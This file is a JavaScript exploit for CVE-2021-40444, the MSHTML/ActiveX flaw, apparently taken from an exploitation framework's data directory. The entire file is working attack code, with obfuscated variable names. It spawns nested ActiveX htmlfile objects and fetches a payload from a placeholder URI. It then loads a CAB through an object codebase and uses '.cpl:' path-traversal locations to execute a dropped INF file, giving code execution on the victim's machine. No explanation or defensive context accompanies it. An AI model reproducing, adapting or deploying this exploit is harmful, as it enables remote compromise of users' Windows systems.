data/exploits/CVE-2021-40444/cve_2021_40444.js
function exploit() {
var x = window["document"];
var then = window["Document"]["prototype"]["createElement"];
var _0x4d7c02 = window["Document"]["prototype"]["write"];
var PL$22 = window["HTMLElement"]["prototype"]["appendChild"];
var opfilter = window["HTMLElement"]["prototype"]["removeChild"];
var range = then["call"](x, "iframe");
try {
PL$22["call"](x["body"], range);
} catch (errx) {
PL$22["call"](x["documentElement"], range);
}
var ACTIVEX = range["contentWindow"]["ActiveXObject"];
var view = new ACTIVEX("htmlfile");
range["contentDocument"]["open"]()["close"]();
try {
opfilter["call"](x["body"], range);
} catch (err) {
opfilter["call"](x["documentElement"], range);
}
view["open"]()["close"]();
var mappedObj = new (view["Script"]["ActiveXObject"])("htmlFile");
mappedObj["open"]()["close"]();
var TokenType = new (mappedObj["Script"]["ActiveXObject"])("htmlFile");
TokenType["open"]()["close"]();
var model = new (TokenType["Script"]["ActiveXObject"])("htmlFile");
model["open"]()["close"]();
var iedom = new ActiveXObject("htmlfile");
var rp_test = new ActiveXObject("htmlfile");
var wmp_test = new ActiveXObject("htmlfile");
var doc = new ActiveXObject("htmlfile");
var a = new ActiveXObject("htmlfile");
var fake = new ActiveXObject("htmlfile");
var errors = window["XMLHttpRequest"];
var $node = new errors;
var directiveProcessors = errors["prototype"]["open"];
var nodeTypeRender = errors["prototype"]["send"];
var newAttributes = window["setTimeout"];
directiveProcessors["call"]($node, "GET", "REPLACE_URI", ![]);
nodeTypeRender["call"]($node);
model["Script"]["document"]["write"]("<body>");
var PL$41 = then["call"](model["Script"]["document"], "object");
PL$41["setAttribute"]("codebase", "REPLACE_URI#version=5,0,0,0");
PL$41["setAttribute"]("classid", "CLSID:edbc374c-5730-432a-b5b8-de94f0b57217");
PL$22["call"](model["Script"]["document"]["body"], PL$41);
iedom["Script"]["location"] = ".cpl:123";
iedom["Script"]["location"] = ".cpl:123";
iedom["Script"]["location"] = ".cpl:123";
iedom["Script"]["location"] = ".cpl:123";
iedom["Script"]["location"] = ".cpl:123";
iedom["Script"]["location"] = ".cpl:123";
iedom["Script"]["location"] = ".cpl:123";
iedom["Script"]["location"] = ".cpl:123";
iedom["Script"]["location"] = ".cpl:123";
iedom["Script"]["location"] = ".cpl:../../../AppData/Local/Temp/Low/REPLACE_INF";
rp_test["Script"]["location"] = ".cpl:../../../AppData/Local/Temp/REPLACE_INF";
wmp_test["Script"]["location"] = ".cpl:../../../../AppData/Local/Temp/Low/REPLACE_INF";
doc["Script"]["location"] = ".cpl:../../../../AppData/Local/Temp/REPLACE_INF";
a["Script"]["location"] = ".cpl:../../../../../Temp/Low/REPLACE_INF";
doc["Script"]["location"] = ".cpl:../../../../../Temp/REPLACE_INF";
doc["Script"]["location"] = ".cpl:../../Low/REPLACE_INF";
doc["Script"]["location"] = ".cpl:../../REPLACE_INF";
}
exploit();